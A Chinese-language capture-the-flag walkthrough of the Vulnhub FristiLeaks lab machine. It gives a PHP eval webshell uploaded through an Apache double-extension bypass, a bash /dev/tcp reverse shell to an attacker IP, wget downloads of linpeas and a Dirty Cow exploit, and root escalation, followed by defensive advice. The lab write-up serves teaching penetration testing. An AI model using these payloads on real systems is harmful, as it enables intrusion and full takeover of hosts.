Vulnhub-FristiLeaks
字数 1109 2025-08-29 22:41:39

Vulnhub-FristiLeaks 靶机渗透测试教学文档

靶机环境准备

  1. 下载与安装

    • 从Vulnhub下载FristiLeaks靶机镜像
    • 使用VMware打开该镜像
  2. 网络配置

    • 网络模式设置为NAT
    • 在高级设置中将MAC地址修改为:08:00:27:A5:A6:76

信息收集阶段

  1. 确定靶机IP

    • 靶机启动后会自动显示IP地址
    • 或使用netdiscover等工具扫描局域网
  2. 端口扫描

    nmap -sV -p- <靶机IP>
    
    • 发现仅开放80端口(HTTP服务)
  3. 目录枚举

    • 使用dirb扫描web目录:
    dirb http://<靶机IP>
    
    • 发现/robots.txt文件
    • 访问显示目录无有效信息
  4. 源码分析

    • 检查网页源代码
    • 发现多处提到"fristi"关键词
    • 尝试访问/fristi目录

Web应用渗透

  1. 登录页面分析

    • /fristi目录下发现登录框
    • 初步猜测可能存在SQL注入漏洞
  2. SQL注入测试

    • 使用sqlmap测试:
    sqlmap -r test.txt --level=5 --risk=3
    
    • 测试结果显示不存在SQL注入
  3. 隐藏信息发现

    • 检查页面源码发现提示信息
    • 发现被注释的base64编码字符串
    • 解码后得到一张图片
  4. 凭据获取

    • 根据提示,用户名可能是eezeepz
    • 密码为图片内容(需人工识别)
    • 使用获取的凭据成功登录

获取初始访问权限

  1. 文件上传漏洞利用

    • 登录后发现文件上传功能
    • 限制上传.jpg, .png, .gif后缀
  2. Apache解析漏洞

    • 使用Wappalyzer识别Apache版本为2.2.15
    • 该版本存在文件后缀名解析漏洞
    • 上传.php.jpg文件会被解析为PHP
  3. 上传Webshell

    • 上传一句话木马:
    <?php @eval($_POST['epoch']); ?>
    
    • 使用蚁剑等工具连接Webshell
  4. 反弹Shell

    • 通过Webshell执行反弹命令:
    bash -i >& /dev/tcp/<攻击机IP>/7777 0>&1
    
    • 在攻击机监听:
    nc -lvnp 7777
    

权限提升

  1. 改善Shell环境

    python -c "import pty;pty.spawn('/bin/bash')"
    
  2. 系统信息收集

    • 下载并运行Linux提权检查脚本:
    wget http://<攻击机IP>/linpeas.sh -O /tmp/linpeas.sh
    chmod +x /tmp/linpeas.sh
    /tmp/linpeas.sh
    
  3. 脏牛(Dirty Cow)漏洞利用

    • 识别系统存在CVE-2016-5195漏洞
    • 下载漏洞利用代码:
    wget http://<攻击机IP>/dirty.c -O /tmp/dirty.c
    
    • 编译并执行:
    gcc -pthread dirty.c -o dirty -lcrypt
    chmod +x ./dirty
    ./dirty mypassword
    
    • 创建具有root权限的firefart用户
  4. 获取Flag

    su firefart
    cd /root
    cat flag.txt
    

总结与关键点

  1. 关键渗透路径

    • 发现隐藏的/fristi目录
    • 通过源码分析获取凭据
    • 利用Apache解析漏洞上传Webshell
    • 使用Dirty Cow漏洞提权
  2. 技术要点

    • Apache 2.2.15的文件解析漏洞
    • 反弹Shell的多种方法
    • Dirty Cow本地提权漏洞利用
  3. 防御建议

    • 及时更新Web服务器软件
    • 严格限制文件上传功能
    • 定期更新操作系统内核
    • 实施最小权限原则
  4. 学习价值

    • 信息收集与源码分析能力
    • 文件上传漏洞的多种绕过方法
    • 从Web渗透到系统提权的完整流程
Vulnhub-FristiLeaks 靶机渗透测试教学文档 靶机环境准备 下载与安装 : 从Vulnhub下载FristiLeaks靶机镜像 使用VMware打开该镜像 网络配置 : 网络模式设置为NAT 在高级设置中将MAC地址修改为: 08:00:27:A5:A6:76 信息收集阶段 确定靶机IP : 靶机启动后会自动显示IP地址 或使用 netdiscover 等工具扫描局域网 端口扫描 : 发现仅开放80端口(HTTP服务) 目录枚举 : 使用dirb扫描web目录: 发现 /robots.txt 文件 访问显示目录无有效信息 源码分析 : 检查网页源代码 发现多处提到"fristi"关键词 尝试访问 /fristi 目录 Web应用渗透 登录页面分析 : /fristi 目录下发现登录框 初步猜测可能存在SQL注入漏洞 SQL注入测试 : 使用sqlmap测试: 测试结果显示不存在SQL注入 隐藏信息发现 : 检查页面源码发现提示信息 发现被注释的base64编码字符串 解码后得到一张图片 凭据获取 : 根据提示,用户名可能是 eezeepz 密码为图片内容(需人工识别) 使用获取的凭据成功登录 获取初始访问权限 文件上传漏洞利用 : 登录后发现文件上传功能 限制上传 .jpg , .png , .gif 后缀 Apache解析漏洞 : 使用Wappalyzer识别Apache版本为2.2.15 该版本存在文件后缀名解析漏洞 上传 .php.jpg 文件会被解析为PHP 上传Webshell : 上传一句话木马: 使用蚁剑等工具连接Webshell 反弹Shell : 通过Webshell执行反弹命令: 在攻击机监听: 权限提升 改善Shell环境 : 系统信息收集 : 下载并运行Linux提权检查脚本: 脏牛(Dirty Cow)漏洞利用 : 识别系统存在CVE-2016-5195漏洞 下载漏洞利用代码: 编译并执行: 创建具有root权限的 firefart 用户 获取Flag : 总结与关键点 关键渗透路径 : 发现隐藏的 /fristi 目录 通过源码分析获取凭据 利用Apache解析漏洞上传Webshell 使用Dirty Cow漏洞提权 技术要点 : Apache 2.2.15的文件解析漏洞 反弹Shell的多种方法 Dirty Cow本地提权漏洞利用 防御建议 : 及时更新Web服务器软件 严格限制文件上传功能 定期更新操作系统内核 实施最小权限原则 学习价值 : 信息收集与源码分析能力 文件上传漏洞的多种绕过方法 从Web渗透到系统提权的完整流程